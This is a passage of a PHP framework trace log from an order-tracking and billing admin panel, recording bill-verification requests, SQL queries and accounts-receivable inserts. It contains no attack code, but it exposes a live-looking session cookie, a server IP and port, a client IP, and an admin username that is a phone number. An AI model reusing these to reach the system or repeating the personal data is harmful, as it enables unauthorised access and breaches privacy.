] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11829 [ RunTime:0.016373s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11828 [ RunTime:0.027090s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11827 [ RunTime:0.026939s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11826 [ RunTime:0.016377s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.013527s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.019259s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.027602s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.026404s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.013545s ] --------------------------------------------------------------- [ 2025-12-14T16:48:41+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11830?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11830?dialog=1 [运行时间:0.084432s][吞吐率:11.84req/s] [内存消耗:6,547.14kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11830', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001511s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000126s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000461s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000785s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000465s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000608s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001139s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000831s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000340s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000876s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001038s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000709s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000777s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000849s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11830' [ RunTime:0.015620s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1294 LIMIT 1 [ RunTime:0.000468s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1072 LIMIT 1 [ RunTime:0.000357s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1083 LIMIT 1 [ RunTime:0.000254s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1079 LIMIT 1 [ RunTime:0.000291s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1150 LIMIT 1 [ RunTime:0.000242s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1151 LIMIT 1 [ RunTime:0.000353s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1065 LIMIT 1 [ RunTime:0.000572s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11830 LIMIT 1 [ RunTime:0.000287s ] --------------------------------------------------------------- [ 2025-12-14T16:48:41+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702121 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702121 [运行时间:0.035586s][吞吐率:28.10req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.002023s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11830?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702121', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001747s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:48:42+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.050774s][吞吐率:19.70req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001246s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11830?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '158', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '158', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001597s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006922s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000464s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000774s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (158) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000643s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (158) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000311s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000890s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"158\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"158\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702122) [ RunTime:0.004814s ] --------------------------------------------------------------- [ 2025-12-14T16:50:02+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11830?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11830?dialog=1 [运行时间:0.187485s][吞吐率:5.33req/s] [内存消耗:6,210.59kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001249s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '1085', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11830?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '程', 1 => '158', ), 'verify_amount' => array ( 0 => '8712', 1 => '8712', 2 => '5676', 3 => '5676', 4 => '3072', 5 => '3072', 6 => '3072', ), 'price' => array ( 0 => '4.9', 1 => '1.4000000000', 2 => '3.2', 3 => '1.2000000000', 4 => '9.1', 5 => '2.2000000000', 6 => '2.2000000000', ), 'money' => array ( 0 => '42688.8', 1 => '12196.8000000000', 2 => '18163.2', 3 => '6811.2000000000', 4 => '27955.199999999997', 5 => '6758.4000000000', 6 => '6758.4000000000', ), 'explain' => array ( 0 => '320W-15底壳8712个', 1 => '320W-9上盖8712个', 2 => '200W-9底壳5676个', 3 => '200w-8风机孔5676个', 4 => '400W-1底壳3072个', 5 => '400W-1上盖3072个', 6 => '400W-1平散热器3072个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'shoukuan_status-5' => '0', 'shoukuan_status-6' => '0', 'shoukuan_status-7' => '0', 'ids' => '11830', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001587s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.005726s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000563s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000814s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000542s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000636s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001552s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000657s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000281s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000875s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000865s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000692s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000969s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000994s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11830' [ RunTime:0.021722s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=8712,`price`=4.9,`money`=42688.8 WHERE `id` = 27824 [ RunTime:0.005216s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001056s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000446s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (158 , 40 , 53599 , 1294 , 11830 , 27824 , 1 , 2025 , 12 , 14 , '320W-15底壳8712个' , 1765702202 , 42688.8 , 10838618.590661) [ RunTime:0.005673s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=8712,`price`=1.4,`money`=12196.8 WHERE `id` = 27825 [ RunTime:0.004791s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000457s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , 